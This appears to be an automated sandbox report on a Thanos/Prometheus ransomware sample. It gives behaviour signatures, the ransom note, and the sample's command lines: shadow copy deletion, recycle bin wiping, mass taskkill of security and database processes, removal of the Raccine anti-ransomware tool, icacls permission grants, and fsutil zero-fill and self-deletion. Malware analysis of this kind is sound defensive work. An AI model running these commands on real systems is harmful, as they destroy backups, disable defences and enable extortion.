Analysis Overview
SHA256
9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b
Threat Level: Known bad
The file HEUR-Trojan-Ransom.MSIL.Thanos.gen-9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.exe was found to be: Known bad.
Malicious Activity Summary
Prometheus Ransomware
Modifies Windows Firewall
Deletes itself
Modifies file permissions
Checks computer location settings
Drops startup file
Modifies WinLogon
Launches sc.exe
Enumerates physical storage devices
Kills process with taskkill
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
System policy modification
Suspicious behavior: EnumeratesProcesses
Modifies registry key
Modifies Internet Explorer settings
Runs ping.exe
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-09-24 09:40
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-09-24 09:40
Reported
2022-09-24 09:43
Platform
win7-20220812-en
Max time kernel
53s
Max time network
46s
Command Line
Signatures
Prometheus Ransomware
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk | C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Thanos.gen-9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" | C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Thanos.gen-9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" | C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Thanos.gen-9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Kills process with taskkill
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Thanos.gen-9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" | C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Thanos.gen-9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" | C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Thanos.gen-9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Thanos.gen-9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.exe
"C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Thanos.gen-9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.exe"
C:\Windows\SysWOW64\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
C:\Windows\SysWOW64\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
C:\Windows\SysWOW64\reg.exe
"reg" delete HKCU\Software\Raccine /F
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
C:\Windows\SysWOW64\sc.exe
"sc.exe" config Dnscache start= auto
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
C:\Windows\SysWOW64\sc.exe
"sc.exe" config FDResPub start= auto
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SSDPSRV start= auto
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SstpSvc start= disabled
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q D:\\$Recycle.bin
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLWriter start= disabled
C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
C:\Windows\SysWOW64\sc.exe
"sc.exe" config upnphost start= auto
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM steam.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM excel.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-49315034789532273-148394022-15405793222080097399-1849993378-972493326-326536713"
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.7 -n 3
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM visio.exe /F
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-770480726577352086-3455611583984106712989048975614272-745713604-2026198166"
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM winword.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
C:\Windows\SysWOW64\icacls.exe
"icacls" "C:*" /grant Everyone:F /T /C /Q
C:\Windows\SysWOW64\icacls.exe
"icacls" "D:*" /grant Everyone:F /T /C /Q
C:\Windows\SysWOW64\icacls.exe
"icacls" "Z:*" /grant Everyone:F /T /C /Q
C:\Windows\SysWOW64\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Thanos.gen-9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.exe
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-876248110195607746693943308109646300-1373818444-688266761-12509476772064884247"
C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
Network
Files
memory/1880-54-0x00000000009B0000-0x00000000009D6000-memory.dmp
memory/1880-55-0x0000000075201000-0x0000000075203000-memory.dmp
memory/280-56-0x0000000000000000-mapping.dmp
memory/580-57-0x0000000000000000-mapping.dmp
memory/892-58-0x0000000000000000-mapping.dmp
memory/532-59-0x0000000000000000-mapping.dmp
memory/1120-60-0x0000000000000000-mapping.dmp
memory/1556-61-0x0000000000000000-mapping.dmp
memory/1824-62-0x0000000000000000-mapping.dmp
memory/1900-63-0x0000000000000000-mapping.dmp
memory/1036-64-0x0000000000000000-mapping.dmp
memory/688-65-0x0000000000000000-mapping.dmp
memory/760-66-0x0000000000000000-mapping.dmp
memory/828-67-0x0000000000000000-mapping.dmp
memory/1660-68-0x0000000000000000-mapping.dmp
memory/1764-69-0x0000000000000000-mapping.dmp
memory/1676-70-0x0000000000000000-mapping.dmp
memory/932-71-0x0000000000000000-mapping.dmp
memory/1972-72-0x0000000000000000-mapping.dmp
memory/1612-73-0x0000000000000000-mapping.dmp
memory/900-74-0x0000000000000000-mapping.dmp
memory/1152-75-0x0000000000000000-mapping.dmp
memory/1792-76-0x0000000000000000-mapping.dmp
memory/796-77-0x0000000000000000-mapping.dmp
memory/824-78-0x0000000000000000-mapping.dmp
memory/1076-79-0x0000000000000000-mapping.dmp
memory/584-80-0x0000000000000000-mapping.dmp
memory/2000-81-0x0000000000000000-mapping.dmp
memory/1824-83-0x0000000000000000-mapping.dmp
memory/1740-84-0x0000000000000000-mapping.dmp
memory/568-85-0x0000000000000000-mapping.dmp
memory/1772-86-0x0000000000000000-mapping.dmp
memory/1172-87-0x0000000000000000-mapping.dmp
memory/1816-88-0x0000000000000000-mapping.dmp
memory/1868-89-0x0000000000000000-mapping.dmp
memory/1068-90-0x0000000000000000-mapping.dmp
memory/1632-91-0x0000000000000000-mapping.dmp
memory/588-92-0x0000000000000000-mapping.dmp
memory/1680-93-0x0000000000000000-mapping.dmp
memory/1700-94-0x0000000000000000-mapping.dmp
memory/1020-95-0x0000000000000000-mapping.dmp
memory/1348-96-0x0000000000000000-mapping.dmp
memory/1996-97-0x0000000000000000-mapping.dmp
memory/1664-98-0x0000000000000000-mapping.dmp
memory/2000-100-0x0000000000000000-mapping.dmp
memory/1676-101-0x0000000000000000-mapping.dmp
memory/984-102-0x0000000000000000-mapping.dmp
memory/864-103-0x0000000000000000-mapping.dmp
memory/624-104-0x0000000000000000-mapping.dmp
memory/1944-105-0x0000000000000000-mapping.dmp
memory/884-106-0x0000000000000000-mapping.dmp
memory/1868-107-0x0000000000000000-mapping.dmp
memory/892-108-0x0000000000000000-mapping.dmp
memory/1984-109-0x0000000000000000-mapping.dmp
memory/1812-110-0x0000000000000000-mapping.dmp
memory/564-111-0x0000000000000000-mapping.dmp
memory/1176-112-0x0000000000000000-mapping.dmp
memory/576-113-0x0000000000000000-mapping.dmp
memory/960-114-0x0000000000000000-mapping.dmp
memory/1600-115-0x0000000000000000-mapping.dmp
memory/1624-116-0x0000000000000000-mapping.dmp
memory/364-117-0x0000000000000000-mapping.dmp
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
| MD5 | e7ae211201a251df38116de69d3696bf |
| SHA1 | 379c54d96d0f53f90b2cf339d3d060db7096098d |
| SHA256 | 1e7ca76ab26210fa011e605a33f17afa203a6e81909f5ec9a3fffc19010e8e2f |
| SHA512 | 80908f3c666a38fb2335011560a15a52a3017a33e8565340d70c9aac24a9f103130eb04fc56f5fb32679e444ea0f13115973472e50603190ed8fbf4754aadf80 |
memory/1900-118-0x0000000000000000-mapping.dmp
memory/304-120-0x0000000000000000-mapping.dmp
memory/1660-121-0x0000000000000000-mapping.dmp
memory/2032-122-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
| MD5 | 6e22a0c9e38e5dcf063d1887b4b67f64 |
| SHA1 | 94445e7f991243d3c5d3e2d19d37bbb2a39eb014 |
| SHA256 | 288c6010d4bec64a234fa94c690adc4033d8fd8c9713e64d9668d8c22a37cbc0 |
| SHA512 | 5803599512a83691b5c5fb497761f6e7f19697160b544539f6f1c0e278f3d94ab3fa571d80901946a8e5ff3d2c655a7d1cac14942995138e3e6041b2b0e4d0db |
memory/932-125-0x000000006EE80000-0x000000006F42B000-memory.dmp
memory/932-126-0x000000006EE80000-0x000000006F42B000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-09-24 09:40
Reported
2022-09-24 09:43
Platform
win10v2004-20220812-en
Max time kernel
65s
Max time network
166s
Command Line
Signatures
Prometheus Ransomware
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Thanos.gen-9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk | C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Thanos.gen-9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" | C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Thanos.gen-9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" | C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Thanos.gen-9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Kills process with taskkill
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" | C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Thanos.gen-9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" | C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Thanos.gen-9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Thanos.gen-9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.exe
"C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Thanos.gen-9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.exe"
C:\Windows\SysWOW64\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
C:\Windows\SysWOW64\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
C:\Windows\SysWOW64\reg.exe
"reg" delete HKCU\Software\Raccine /F
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
C:\Windows\SysWOW64\sc.exe
"sc.exe" config Dnscache start= auto
C:\Windows\SysWOW64\sc.exe
"sc.exe" config FDResPub start= auto
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q D:\\$Recycle.bin
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SSDPSRV start= auto
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SstpSvc start= disabled
C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
C:\Windows\SysWOW64\sc.exe
"sc.exe" config upnphost start= auto
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLWriter start= disabled
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
C:\Windows\SysWOW64\taskkill.exe
